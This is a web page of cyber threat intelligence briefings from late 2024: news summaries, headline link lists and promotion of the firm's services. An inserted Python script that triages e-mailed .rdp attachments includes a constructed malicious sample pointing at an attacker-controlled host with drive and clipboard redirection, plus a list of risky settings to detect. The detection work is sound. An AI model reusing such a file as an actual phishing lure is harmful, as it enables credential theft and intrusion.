-Small Businesses Boosting Cyber Security as Threats Grow
-The Rise of the vCISO: From Niche to Necessity?
-Five Eyes Agencies Offer Security Advice for Small Businesses
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy-to-digest round-up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Top Cyber Stories of the Last Week
Banks and Regulators Warn of Rise in ‘Quishing’ QR Code Scams
Banks and regulators have flagged a concerning rise in "quishing" scams, where fraudsters use QR codes in emails to bypass corporate cyber security. This technique, which embeds QR codes in PDF attachments, often evades standard security filters and tricks recipients into disclosing financial details. Having grown during the pandemic, such scams now represent over 20% of UK online scams, with reports doubling in the past year. While these scams frequently occur via email, they also target public QR code installations, from parking meters to EV chargers. As quishing continues to evolve, organisations may need to enhance detection capabilities to counter this growing threat.
Russia Carrying Out Targeted Attacks In UK, Microsoft Warns
Microsoft and AWS have issued warnings about targeted cyber attacks by a Russian-backed group, aimed primarily at the UK and other countries. Known as Midnight Blizzard or APT29, this group has been using highly targeted spear-phishing emails since October to infiltrate government, defence, academic, and non-profit sectors. Posing as Microsoft or AWS staff, the attackers use social engineering techniques built around Remote Desktop Protocol (RDP) file attachments that, when opened, create direct connections to attacker-controlled servers. This method can expose user credentials and facilitate unauthorised access to sensitive information, including redirected device resources, potentially allowing attackers to install persistent malware on compromised systems.
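The danger in the campaign above lies in what a `.rdp` attachment is allowed to do once opened: the file names the server to connect to and can redirect local drives, clipboard and other devices to it. A mail gateway or SOC triage script can read those settings before a user ever double-clicks. The following Python is an added example written for this briefing, not code from Black Arrow, Microsoft or AWS; the allowlist of approved RDP hosts and the two sample attachments are constructed for illustration, while the setting names (`full address`, `drivestoredirect`, `redirectclipboard`, `remoteapplicationmode` and so on) are standard `.rdp` keys.

```python
"""Triage .rdp e-mail attachments: flag files that point at an unknown host
or hand local resources (drives, clipboard, devices) to the remote side.

Added example for illustration; not a vendor's or Black Arrow's tooling.
"""
from dataclasses import dataclass, field

# Assumption: the organisation's own RDP gateways. Anything else is unexpected
# in an unsolicited attachment.
TRUSTED_RDP_HOSTS = {"rds.corp.example"}

# Standard .rdp settings that redirect local resources to the remote host,
# with a predicate saying when the value actually enables the redirection.
RISKY_SETTINGS = {
    "drivestoredirect": lambda v: v.strip() != "",        # local drives shared
    "devicestoredirect": lambda v: v.strip() != "",       # plug-and-play devices
    "redirectclipboard": lambda v: v.strip() == "1",
    "redirectprinters": lambda v: v.strip() == "1",
    "redirectsmartcards": lambda v: v.strip() == "1",
    "remoteapplicationmode": lambda v: v.strip() == "1",  # RemoteApp hides the remote desktop
}


@dataclass
class RdpVerdict:
    host: str
    findings: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.findings)


def parse_rdp(text: str) -> dict:
    """Parse the 'key:type:value' lines of an .rdp file into {key: (type, value)}.
    Malformed lines are skipped rather than raising, since the input is hostile."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":", 2)
        if len(parts) != 3:
            continue
        key, typ, value = parts
        settings[key.strip().lower()] = (typ.strip(), value)
    return settings


def triage_rdp(text: str, trusted_hosts=TRUSTED_RDP_HOSTS) -> RdpVerdict:
    """Return a verdict listing every reason the attachment deserves a second look."""
    settings = parse_rdp(text)
    host = settings.get("full address", ("s", ""))[1].strip()
    hostname = host.split(":")[0].lower()          # drop an optional :port
    verdict = RdpVerdict(host=host)
    if not hostname:
        verdict.findings.append("no 'full address' target in file")
    elif hostname not in trusted_hosts:
        verdict.findings.append(f"target host {hostname!r} is not an approved RDP gateway")
    for key, is_enabled in RISKY_SETTINGS.items():
        if key in settings and is_enabled(settings[key][1]):
            verdict.findings.append(f"{key} enabled ({settings[key][1].strip()!r})")
    return verdict


# Constructed sample attachments (not real campaign artefacts).
SAMPLE_PHISH_RDP = """\
full address:s:rdp.attacker-controlled.example:3389
drivestoredirect:s:*
redirectclipboard:i:1
remoteapplicationmode:i:1
prompt for credentials:i:0
"""

SAMPLE_BENIGN_RDP = """\
full address:s:rds.corp.example
drivestoredirect:s:
redirectclipboard:i:0
"""

if __name__ == "__main__":
    for label, sample in (("phish", SAMPLE_PHISH_RDP), ("benign", SAMPLE_BENIGN_RDP)):
        v = triage_rdp(sample)
        print(f"{label}: host={v.host!r} suspicious={v.suspicious}")
        for f in v.findings:
            print("  -", f)
```

The script only reads the attachment; it does not open a connection. A practical deployment would run `triage_rdp` on every `.rdp` (and `.rdp` inside archives) at the mail gateway and quarantine anything with findings, since legitimate internal RDP files rarely arrive by e-mail and almost never need drive redirection to an external host.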
Spoof Eventbrite Phishing Emails Lure in Victims in Major Attack
Cyber criminals have increasingly exploited Eventbrite’s platform, with a 900% surge in phishing attacks using this trusted event management service. Hackers create fake events under familiar brand names, leveraging Eventbrite's built-in mailing system to distribute phishing emails that bypass common security filters due to the trusted domain of ‘noreply@events.eventbrite.com’. Through these messages, victims are urged to take immediate action, often leading to the disclosure of sensitive data like login credentials, tax identification numbers, and payment details. This method has proven effective, highlighting the need for heightened vigilance around trusted online platforms.
Business Email Compromise Scams Dominate Q3 2024 Threats
The VIPRE Security Group’s recent report highlights the increasing sophistication of Business Email Compromise (BEC) scams, which accounted for 58% of phishing attempts and heavily relied on impersonating authority figures such as CEOs and IT staff, representing 89% of these attacks. Techniques like URL redirection and harmful attachments disguised as critical documents have increased, underscoring the need for robust cyber security measures and employee awareness, especially approaching the holiday season.
This Nasty Android Trojan is Hijacking Calls to Your Bank and Sending Them to Hackers
A recent report highlights a sophisticated threat from the Android-based FakeCall trojan, which intercepts sensitive calls by replacing the phone’s default dialler. This malicious software enables hackers to hijack both incoming and outgoing calls, allowing them to impersonate bank staff and gather sensitive data from unsuspecting users. FakeCall is distributed through malicious apps that exploit Android’s accessibility features. Since its detection in 2022, FakeCall has expanded its reach, now able to mimic over 20 financial organisations. This trojan's continuous development, including screen streaming and screenshot capabilities, points to its evolving potency.
What Military Wargames Can Teach About Cyber Security
Tabletop wargaming has become an essential tool in cyber security, helping organisations prepare for the swift, critical decisions required in the first 24-48 hours of a ransomware attack. Despite the widespread use of technologies to prevent cyber attacks, 2024 has seen an increase in ransomware and data breaches, exposing gaps in many companies' response capabilities. By simulating realistic ransomware scenarios, tabletop exercises enable organisations to stress-test response strategies, address compliance gaps, and refine their disaster recovery plans. This hands-on approach enhances organisational resilience, ensuring leadership and cross-functional teams are equipped for effective incident response and secure recovery. Black Arrow Cyber Consulting provides proctored tabletop cyber incident response exercises, enabling firms to better handle and recover from cyber incidents.
Businesses Expect Cyber Threats to Rise, but Aren’t Ready for Them
Recent research indicates UK businesses are increasingly concerned about cyber threats, with 75% of companies reporting a rise in attempted attacks and nearly 40% experiencing a successful breach. Despite these concerns, only 35% of leaders feel adequately prepared to handle cyber incidents. This gap between awareness and readiness highlights the need for robust, proactive security measures, especially as the UK emerges as the most targeted country in Europe. As organisations recognise the strategic value of cyber security, embedding it into decision-making becomes essential to protect against evolving digital risks and ensure future resilience.
The Overlooked Importance of Identifying the Riskiest Users
Reach Security highlights the significance of identifying and managing the riskiest users within an organisation. Their findings indicate that 80% to 90% of cyber security threats are linked to just 3% to 5% of users, with 20% of these high-risk individuals changing each month. Implementing a "see one, do one, teach one" model, similar to healthcare’s incremental learning, can empower high-risk users to understand and mitigate specific threats. This approach helps organisations allocate resources more effectively, reduce dependency on numerous security tools, and foster a more resilient cyber security culture by enabling high-risk users to act as advocates within the organisation.
Hackers Targeted a $12 Billion Cyber Security Company with a Deepfake of Its CEO. Here's Why Small Details Made It Unsuccessful.
A recent incident involving $12 billion cyber security firm Wiz highlights the growing threat of deepfake scams targeting top executives. Hackers attempted to use an audio deepfake of Wiz’s CEO, Assaf Rappaport, to steal employee credentials, aiming to access the firm’s internal systems and data. The attempt failed because employees recognised the CEO’s distinct speech patterns. Deepfake scams are increasingly sophisticated, with recent reports indicating that half of global companies have faced such attacks, and 66% of business leaders see deepfakes as a serious risk to their organisations.
Small Businesses Boosting Cyber Security as Threats Grow
The Identity Theft Resource Center’s latest report highlights that small businesses are increasingly bolstering their cyber security efforts in response to growing identity-related cyber attacks. Over 80% of small businesses reported experiencing a cyber attack or data breach in the past year, with financial losses exceeding $500,000 and in some cases doubling. In response, many small businesses are ramping up investment in security tools, staff training, and vendor checks. Additionally, as new state privacy laws emerge, over 75% of small business leaders express concern about compliance, spurring increased focus on data protection practices.
The Rise of the vCISO: From Niche to Necessity?
The rise of virtual Chief Information Security Officers (vCISOs) highlights a shift in cyber security for small and medium-sized businesses (SMBs). With cyber threats evolving rapidly, vCISOs offer flexible, high-level security expertise that strengthens defences while remaining cost-effective. vCISOs help organisations navigate complex regulatory requirements and manage emerging technologies, such as IoT and machine learning, ensuring a tailored security approach that promotes resilience and business growth. Speak to Black Arrow about our fully scalable and flexible vCISO service to help organisations of all sizes and sectors.
Five Eyes Agencies Offer Security Advice for Small Businesses
The Five Eyes alliance, composed of intelligence agencies from the US, UK, Canada, Australia, and New Zealand, has issued new security guidelines to support small businesses, especially tech firms, in defending against cyber attacks. These guidelines focus on safeguarding intellectual property from sophisticated state-backed actors, such as China, as well as criminal groups and competitors. Recommendations include appointing dedicated security managers, keeping a comprehensive asset inventory, and managing data access with third-party partners. This coordinated effort aims to strengthen business security globally, reducing vulnerabilities across both private and public sectors.
Sources:
https://www.ft.com/content/8aca741e-6448-4511-a54d-64f3a97747b1
https://www.silicon.co.uk/security/microsoft-aws-attacks-russia-586762
https://securitybrief.co.nz/story/business-email-compromise-scams-dominate-q3-2024-threats
https://www.techradar.com/pro/businesses-expect-cyber-threats-to-rise-but-arent-ready-for-them
https://securityboulevard.com/2024/10/small-businesses-boosting-cybersecurity-as-threats-grow-itrc/
https://www.csoonline.com/article/3595617/the-rise-of-the-vciso-from-niche-to-necessity.html
https://www.scworld.com/news/five-eyes-agencies-offers-security-advice-for-small-businesses
Governance, Risk and Compliance
The 10 biggest issues CISOs and cyber teams face today | CSO Online
Businesses expect cyber threats to rise, but aren’t ready for them | TechRadar
Most companies are bracing for a cyber attack within a year
For a Stronger Security Culture, Replace Sticks With Carrots
The rise of the vCISO: From niche to necessity? | CSO Online
Security outsourcing on the rise as CISOs seek cyber relief | CSO Online
Small Businesses Boosting Cyber Security as Threats Grow: ITRC - Security Boulevard
The State of Cyber Security: Challenges, Priorities and Insights - Infosecurity Magazine
CISOs as Organisational Bridge Builders for Cyber Security Culture | HackerNoon
13 Cyber Crime Facts That Will Give You Chills | HackerNoon
A Halloween Haunting: Unveiling Cyber Security’s Scary Stats
Terrifying Trends in the 2024 Cyber Threat Landscape - Security Boulevard
Spooky Cyber Stats and Trends in Time for Halloween
Five Eyes agencies offer security advice for small businesses | SC Media
Security priorities emphasize CISO role on the rise | CSO Online
Three quarters of businesses report rise in cyber attacks
Is Your Business Truly Safe From Risk? | Entrepreneur
What Military Wargames Can Teach Us About Cyber Security
NCSC warns of gap between threats and defence capabilities
99% of CISOs work extra hours every week - Help Net Security
How CIOs and CISOs can partner to improve workforce productivity and security | CIO
The Power of Proactive Risk Assessments in Cyber Security - Security Boulevard
Threats
Ransomware, Extortion and Destructive Attacks
Black Basta ransomware poses as IT support on Microsoft Teams to breach networks
In legal first, Japan convicts man of abusing AI to generate ransomware | Malay Mail
Black Basta Ransomware Operators Using Microsoft Teams To Breach Organisations
Fog ransomware targets SonicWall VPNs to breach corporate networks
Patched SonicWall critical vulnerability still used in several ransomware attacks | CSO Online
Black Basta operators phish employees via Microsoft Teams - Help Net Security
North Korean govt hackers linked to Play ransomware attack
Three common privilege access mistakes that can lead to a ransomware incident | SC Media
Russia sentences REvil ransomware members to over 4 years in prison
Massive PSAUX ransomware attack targets 22,000 CyberPanel instances
REvil convictions unlikely to curb Russian cyber crime | TechTarget
Ransomware hits web hosting servers via vulnerable CyberPanel instances - Help Net Security
The ransomware negotiation playbook adds new chapters | CSO Online
Ransomware Victims
OnePoint Patient Care Data Breach Exposes 795,000 Records
Atende refused to pay the ransom, and now pays the price | CSO Online
Interbank confirms data breach following failed extortion, data leak
Ransomware hits web hosting servers via vulnerable CyberPanel instances - Help Net Security
Phishing & Email Based Attacks
Cyber Scams & Why We Fall for Them - Security Boulevard
BEC cyber attacks have the highest financial impact - Digital Journal
Business Email Compromise scams dominate Q3 2024 threats
The Weapon of Choice of Cyber Criminals: BEC Impersonation
Spoof Eventbrite phishing emails look to lure in victims in major attack | TechRadar
Threat actors are stepping up their tactics to bypass email protections - Help Net Security
Black Basta operators phish employees via Microsoft Teams - Help Net Security
Phishers reach targets via Eventbrite services - Help Net Security
Spooky Spam, Scary Scams: Halloween Threats Rise - Security Boulevard
Microsoft Warns of Russian Spear-Phishing Attacks Targeting Over 100 Organisations - SecurityWeek
Russian Hackers Pose as Microsoft Employees in Email Phishing Attacks
Facebook Businesses Targeted in Infostealer Phishing Campaign
Cyber criminals are leveraging big retail names in attacks this holiday season | TechRadar
Over a thousand online shops hacked to show fake product listings
Russian spies using remote desktop protocol files to phish • The Register
New Xiu Gou Phishing Kit Targets US, Other Countries with Mascot - Infosecurity Magazine
Hackers are swiping cookies to bypass email security, FBI says - UPI.com
APT29 Spearphishing Campaign Targets Thousands with RDP Files - Infosecurity Magazine
German MPs and their staff fail simple phishing attack test | Tom's Hardware
Russia Is Targeting US Officials in Email Phishing Campaign: Microsoft - Bloomberg
Ukraine Warns of Mass Phishing Campaign Targeting Citizens Data - Infosecurity Magazine
Business Email Compromise (BEC)/Email Account Compromise (EAC)
BEC cyber attacks have the highest financial impact - Digital Journal
Business email compromise scams dominate Q3 2024 threats
The Weapon of Choice of Cyber Criminals: BEC Impersonation
Phishers reach targets via Eventbrite services - Help Net Security
AI-Powered BEC Scams Zero in on Manufacturers - Infosecurity Magazine
Other Social Engineering
Cyber Scams & Why We Fall for Them - Security Boulevard
BEC cyber attacks have the highest financial impact - Digital Journal
Banks and regulators warn of rise in ‘quishing’ QR code scams
Hackers Sent a Deepfake of Wiz CEO to Dozens of Employees | Entrepreneur
Fraudsters revive old tactics mixed with modern technology - Help Net Security
How Hackers Exploit Google To Target You
Mishing in Motion: Uncovering the Evolving Functionality of FakeCall Malware - Zimperium
Artificial Intelligence
In legal first, Japan convicts man of abusing AI to generate ransomware | Malay Mail
Hackers Sent a Deepfake of Wiz CEO to Dozens of Employees | Entrepreneur
Mozilla: ChatGPT Can Be Manipulated Using Hex Code
AI Cyber Attacks Rise but Businesses Still Lack Insurance - Security Boulevard
Future capabilities of AI-powered threats
How artificial intelligence is lowering the barrier to cyber crime
Trust and risk in the AI era - Help Net Security
White House Issues New Directive on AI and National Security | UC Berkeley School of Information
Apple is challenging hackers to break into the company's servers | Fortune
Regulators Combat Deepfakes With Anti-Fraud Rules
80 percent believe cyber security skills will be vital in AI environments
2FA/MFA
New Windows Warning As Hacker Breaks Google Chrome 2FA Security Encryption
Malware
New Windows Driver Signature bypass allows kernel rootkit installs
Police hacks, disrupts Redline, Meta infostealer operations - Help Net Security
'All servers' for Redline and Meta infostealers hacked by Dutch police and FBI
Malvertising Campaign Hijacks Facebook Accounts to Spread SYS01stealer Malware
New Xiu Gou Phishing Kit Targets US, Other Countries with Mascot - Infosecurity Magazine
BeaverTail Malware Resurfaces in Malicious npm Packages Targeting Developers
Kremlin-backed hackers have new Windows and Android malware to foist on Ukrainian foes
Why Wiping Your Hard Drive Doesn't Always Remove Malware
Mishing in Motion: Uncovering the Evolving Functionality of FakeCall Malware - Zimperium
Government Sector Suffers 236% Surge in Malware Attacks - Infosecurity Magazine
Bots/Botnets
Microsoft: Chinese hackers use Quad7 botnet to steal credentials
Mobile
Macron's bodyguards show his location by sharing Strava data • The Register
Google Warns Of New Android And Windows Cyber Attack—1 Thing Stops It
Android malware "FakeCall" now reroutes bank calls to attackers
These Samsung phones are at risk for a big security vulnerability | Digital Trends
Russia Targets Ukraine Army via Spoofed Recruitment App
Denial of Service/DoS/DDoS
DDoS attacks surge to unprecedented levels, bombarding servers with 4.2Tbps | Cybernews
Is DDoS being left out in the cold by regulations? | TechFinitive
Russia arrests hacker accused of preventing electronic voting during local election
Internet of Things – IoT
Government Warns Foreign Tech In Cars Is Vulnerable To Hackers, Proposes Ban
IoT needs more respect for its consumers, creations, and itself - Help Net Security
Hackers target critical zero-day vulnerability in PTZ cameras
Data Breaches/Leaks
Free, France’s second largest ISP, confirms data breach after leak
ICO: 55% of UK Adults Have Had Data Lost or Stolen - Infosecurity Magazine
Hacker claims to have data linked to 19 million French mobile and internet customers | ITPro
Over 80% of US Small Businesses Have Been Breached - Infosecurity Magazine
OnePoint Patient Care Data Breach Exposes 795,000 Records
Cyber Security Breaches Survey 2024: Impact of Cyber Crime | SC Media UK
Combatting Human Error: How To Safeguard Your Business Against Costly Data Breaches
Organised Crime & Criminal Actors
Russia sentences REvil ransomware members to over 4 years in prison
How artificial intelligence is lowering the barrier to cyber crime
REvil convictions unlikely to curb Russian cyber crime | TechTarget
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Insider Risk and Insider Threats
Ex-Disney techie arrested for potentially deadly menu hacks • The Register
The Overlooked Importance of Identifying Riskiest Users
Combatting Human Error: How To Safeguard Your Business Against Costly Data Breaches
Insider threat hunting best practices and tools | TechTarget
Insurance
AI Cyber Attacks Rise but Businesses Still Lack Insurance - Security Boulevard
Supply Chain and Third Parties
Third-Party Identities: The Weakest Link in Your Cyber Security Supply Chain
How the NIS2 Directive Impacts Supply Chain Cyber Security
Cloud/SaaS
AWS CDK flaw exposed accounts to full takeover • The Register
Black Basta Ransomware Operators Using Microsoft Teams To Breach Organisations
Adversarial groups adapt to exploit systems in new ways - Help Net Security
The SaaS Governance Gap | Grip Security - Security Boulevard
NIS2 Arrives with Major Changes to EU SaaS Cyber Security - Security Boulevard
What the CrowdStrike outage teaches us about cloud security | SC Media
China's 'Evasive Panda' APT Debuts High-End Cloud Hijacking
Black Basta operators phish employees via Microsoft Teams - Help Net Security
Hackers find 15,000 credentials by scanning for git configuration | CyberScoop
Chinese Hackers Use CloudScout Toolset to Steal Session Cookies from Cloud Services
New Details Emerge About Expansive TeamTNT Attacks | MSSP Alert
Outages
Delta Sues CrowdStrike Over ‘Catastrophic’ Software Glitch – BNN Bloomberg
What the CrowdStrike outage teaches us about cloud security | SC Media
When Cyber Security Tools Backfire
The Case Against Abandoning CrowdStrike Post-Outage
Identity and Access Management
Third-Party Identities: The Weakest Link in Your Cyber Security Supply Chain
Three common privilege access mistakes that can lead to a ransomware incident | SC Media
Encryption
Quantum Computing and Cyber Security – Preparing for a New Age of Threats | MSSP Alert
How to achieve crypto-agility and future-proof security | TechTarget
Linux and Open Source
Admins Spring into action over latest open source vuln • The Register
Hardening Linux Servers Against Threats and Attacks | Linux Journal
Passwords, Credential Stuffing & Brute Force Attacks
The state of password security in 2024 - Help Net Security
Hackers find 15,000 credentials by scanning for git configuration | CyberScoop
Microsoft: Chinese hackers use Quad7 botnet to steal credentials
Social Media
Malvertising Campaign Hijacks Facebook Accounts to Spread SYS01stealer Malware
Stolen credit cards up for grabs on Meta’s Threads • The Register
Facebook Businesses Targeted in Infostealer Phishing Campaign
Malicious Ads Are Flooding Facebook: Here's How to Stay Safe
Malvertising
Malvertising Campaign Hijacks Facebook Accounts to Spread SYS01stealer Malware
Malicious Ads Are Flooding Facebook: Here's How to Stay Safe
Training, Education and Awareness
For a Stronger Security Culture, Replace Sticks With Carrots
3 crucial considerations for your security awareness and training program | CSO Online
Regulations, Fines and Legislation
NIS2 Arrives with Major Changes to EU SaaS Cyber Security - Security Boulevard
NIS2 directive impact | Professional Security Magazine
NIS2 Compliance Puts Strain on Business Budgets - Infosecurity Magazine
Cyber Security | UK Regulatory Outlook October 2024 - Osborne Clarke | Osborne Clarke
UK organisations scrambling to divert funds for NIS2 compliance spending | ITPro
The SEC is Cracking Down on Misleading Cyber Security Disclosure | Fenwick & West LLP - JDSupra
Industry trade groups still have ‘concerns’ with cyber reporting mandate | CyberScoop
Is DDoS being left out in the cold by regulations? | TechFinitive
Regulators Combat Deepfakes With Anti-Fraud Rules
Models, Frameworks and Standards
NIS2 Arrives with Major Changes to EU SaaS Cyber Security - Security Boulevard
NIS2 directive impact | Professional Security Magazine
UK organisations scrambling to divert funds for NIS2 compliance spending | ITPro
Backup and Recovery
Is Backup Testing Part of Your Security Strategy? | HackerNoon
Data Protection
ICO: 55% of UK Adults Have Had Data Lost or Stolen - Infosecurity Magazine
Careers, Working in Cyber and Information Security
99% of CISOs work extra hours every week - Help Net Security
Mastering Cyber Security: A Comprehensive Guide to Self-Learning - Security Boulevard
Aldi managers paid more than government cyber security expert
UK needs cyber security professionals, but won't pay up • The Register
80 percent believe cyber security skills will be vital in AI environments
The Government Wants You to Fight Cyber Crime. Do You Have What It Takes?
Cyber Security Awareness Month: 5 new AI skills cyber pros need
Law Enforcement Action and Take Downs
In legal first, Japan convicts man of abusing AI to generate ransomware | Malay Mail
Alexander McCartney: Catfish killer brought down by one phone call - BBC News
Police hacks, disrupts Redline, Meta infostealer operations - Help Net Security
'All servers' for Redline and Meta infostealers hacked by Dutch police and FBI
Two notorious infostealer malware operations were just knocked offline | ITPro
FBI has conducted more than 30 disruption operations in 2024 | CyberScoop
REvil convictions unlikely to curb Russian cyber crime | TechTarget
Russia arrests hacker accused of preventing electronic voting during local election
Misinformation, Disinformation and Propaganda
Senator says domain reg firms aiding Russian disinfo spread • The Register
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
What can businesses learn from the rise of cyber espionage?
Nation State Actors
Cyber threats surge from state-sponsored and criminal actors
China
China's 'Evasive Panda' APT Debuts High-End Cloud Hijacking
US says Chinese hackers breached multiple telecom providers
Microsoft: Chinese hackers use Quad7 botnet to steal credentials
Government Warns Foreign Tech In Cars Is Vulnerable To Hackers, Proposes Ban
Chinese Hackers Use CloudScout Toolset to Steal Session Cookies from Cloud Services
Inside Sophos' 5-Year War With the Chinese Hackers Hijacking Its Devices | WIRED
Chinese hackers targeted phones used by Trump and Vance, New York Times reports - The Hindu
Donald Trump and JD Vance potential targets of China cyber attack - BBC News
Chinese Hackers Reportedly Targeted Trump, Vance Phones
China's Elite Cyber Corps Hone Skills on Virtual Battlefields
Russia and China-linked state hackers intensify attacks on Netherlands, security officials warn
Beijing claims it's found spy devices at sea • The Register
Canada Faces 'Second-to-None' PRC-Backed Threat Actors
Russia
Russia Carrying Out Targeted Attacks In UK, Microsoft Warns
Amazon seizes domains used in rogue Remote Desktop campaign to steal data
New Cyber Attack Warning—Confirming You Are Not A Robot Can Be Dangerous
APT29 Spearphishing Campaign Targets Thousands with RDP Files - Infosecurity Magazine
Google Warns Of New Android And Windows Cyber Attack—1 Thing Stops It
Microsoft Warns of Russian Spear-Phishing Attacks Targeting Over 100 Organisations - SecurityWeek
Russian Hackers Pose as Microsoft Employees in Email Phishing Attacks
Russian spies using remote desktop protocol files to phish • The Register
Senator says domain reg firms aiding Russian disinfo spread • The Register
Russia’s ‘Midnight Blizzard’ hackers target government workers in novel info-stealing campaign
Kremlin-backed hackers have new Windows and Android malware to foist on Ukrainian foes
Sweden and Norway rethink cashless society plans over Russia security fears | Sweden | The Guardian
Pro-Russia hackers claim Greater Manchester council cyber attacks - BBC News
Kremlin-linked hackers target Ukraine’s state, military agencies in new espionage campaign
Russia and China-linked state hackers intensify attacks on Netherlands, security officials warn
Russia Targets Ukraine Army via Spoofed Recruitment App
Russia Is Targeting US Officials in Email Phishing Campaign: Microsoft - Bloomberg
Ukraine Warns of Mass Phishing Campaign Targeting Citizens Data - Infosecurity Magazine
REvil convictions unlikely to curb Russian cyber crime | TechTarget
Russia sentences REvil ransomware members to over 4 years in prison
Iran
Cyber threats surge from state-sponsored and criminal actors
Iran Hackers Peddle Stolen Trump Emails
North Korea
Cyber threats surge from state-sponsored and criminal actors
Tools and Controls
For a Stronger Security Culture, Replace Sticks With Carrots
Threat actors are stepping up their tactics to bypass email protections - Help Net Security
The Overlooked Importance of Identifying Riskiest Users
Is Backup Testing Part of Your Security Strategy? | HackerNoon
The SaaS Governance Gap | Grip Security - Security Boulevard
Proactive and responsible disclosure | Professional Security Magazine
When Cyber Security Tools Backfire
What Military Wargames Can Teach Us About Cyber Security
Attack surface management: The key to securing expanding digital frontiers | SC Media
New report reveals persistent API security breaches risk
Hackers are swiping cookies to bypass email security, FBI says - UPI.com
US, Australia Release New Security Guide for Software Makers - SecurityWeek
More Than Just a Corporate Wiki? How Threat Actors are Exploiting Confluence - Security Boulevard
Why cyber tools fail SOC teams - Help Net Security
Into the Wild: Using Public Data for Cyber Risk Hunting
API Security Matters: The Risks of Turning a Blind Eye - SecurityWeek
Designing a Future-focused Cyber Security Investment Strategy - SecurityWeek
The Power of Proactive Risk Assessments in Cyber Security - Security Boulevard
Risk hunting: A proactive approach to cyber threats - Help Net Security
Top 10 Cyber Security Metrics and KPIs | Mimecast
Apple opens Private Cloud Compute to public scrutiny • The Register
German MPs and their staff fail simple phishing attack test | Tom's Hardware
Insider threat hunting best practices and tools | TechTarget
How IT leaders can assess “secure-by-design” software claims | CIO
Companies are spending barely any IT budget on security | TechRadar
Reports Published in the Last Week
Other News
Small Businesses Boosting Cyber Security as Threats Grow: ITRC - Security Boulevard
13 Cyber Crime Facts That Will Give You Chills | HackerNoon
Spooky Cyber Stats and Trends in Time for Halloween
Five Eyes Agencies Launch Startup Security Initiative - Infosecurity Magazine
Five Eyes tell tech startups to take infosec seriously • The Register
Terrifying Trends in the 2024 Cyber Threat Landscape - Security Boulevard
Stop being a sitting target for cyber threats! | TechRadar
Healthcare Breaches Costliest for 12 Years Running, Hit New $10.1M Record High
Irish businesses now facing more than one cyber attack per week
Funding crisis ‘puts universities at higher risk of cyber attacks’
CISA Launches First International Cyber Security Plan - Infosecurity Magazine
Lateral Movement in Recent Cyber Security Breaches - Security Boulevard
Government Sector Suffers 236% Surge in Malware Attacks - Infosecurity Magazine
US, Australia Release New Security Guide for Software Makers - SecurityWeek
Proactive & Preventative Cyber Defence - DevX
OT security becoming a mainstream concern | CSO Online
Microsoft delays its troubled AI-powered Recall feature yet again | ZDNET
Vulnerability Management
Many financial firms have high-severity software security flaws over a year old | TechRadar
Put End-of-Life Software to Rest
Microsoft Update Warning—400 Million Windows PCs Now At Risk
A Sherlock Holmes Approach to Cyber Security: Eliminate the Impossible with Exposure Validation
Microsoft will charge Windows 10 users $30 per year for security updates | Tom's Hardware
Vulnerabilities
Apple Patches Over 70 Vulnerabilities Across iOS, macOS, Other Products - SecurityWeek
New tool bypasses Google Chrome’s new cookie encryption system
AWS CDK flaw exposed accounts to full takeover • The Register
New Cisco ASA and FTD features block VPN brute-force password attacks
New Windows Driver Signature bypass allows kernel rootkit installs
Fog ransomware targets SonicWall VPNs to breach corporate networks
Patched SonicWall critical vulnerability still used in several ransomware attacks | CSO Online
Researchers Uncover OS Downgrade Vulnerability Targeting Microsoft Windows Kernel
New Research Reveals Spectre Vulnerability Persists in Latest AMD and Intel Processors
Wi-Fi Alliance test suite has a worrying security flaw | TechRadar
New Windows Warning As Hacker Breaks Google Chrome 2FA Security Encryption
Synology, QNAP, TrueNAS Address Vulnerabilities Exploited at Pwn2Own Ireland - SecurityWeek
Google Patches Critical Chrome Vulnerability Reported by Apple - SecurityWeek
LiteSpeed Cache Plugin Vulnerability Poses Admin Access Risk - Infosecurity Magazine
Admins Spring into action over latest open source vuln • The Register
Opera Browser Fixes Big Security Hole That Could Have Exposed Your Information
These Samsung phones are at risk for a big security vulnerability | Digital Trends
CVE-2024-9680 – Mozilla Firefox Security Vulnerability – October 2024 - Security Boulevard
Hackers target critical zero-day vulnerability in PTZ cameras
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Intelligence Briefing 25 October 2024
Black Arrow Cyber Threat Intelligence Briefing 25 October 2024:
-Overconfidence in Cyber Security: A Hidden Risk
-Gallagher Re Study Links Cyber Security Gaps to Higher Insurance Claims
-AI and Deepfakes Fuel Phishing Scams, Making Detection Harder
-AI-Generated Cyber Threats Have C-Suite Leaders on Edge
-The Single Biggest Vulnerability in Your Cyber Security Is You
-Why Cyber Security Acumen Matters in the C-Suite
-Cyber Incidents Surge, Damaging Brand Trust and Business Relationships – Hiscox
-Cyber Resilience vs Cyber Security: Which is More Critical?
-Phishing Attacks Snare Security and IT Leaders
-CISO Role Gaining Influence as 20% Report Directly to CEOs, Finds Survey
-Threat Actors Are Exploiting Vulnerabilities Faster Than Ever
-Employees Lack Fundamental Security Awareness
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy-to-digest round-up of the most notable threats, vulnerabilities, and cyber-related news from the last week.
Top Cyber Stories of the Last Week
Overconfidence in Cyber Security: A Hidden Risk
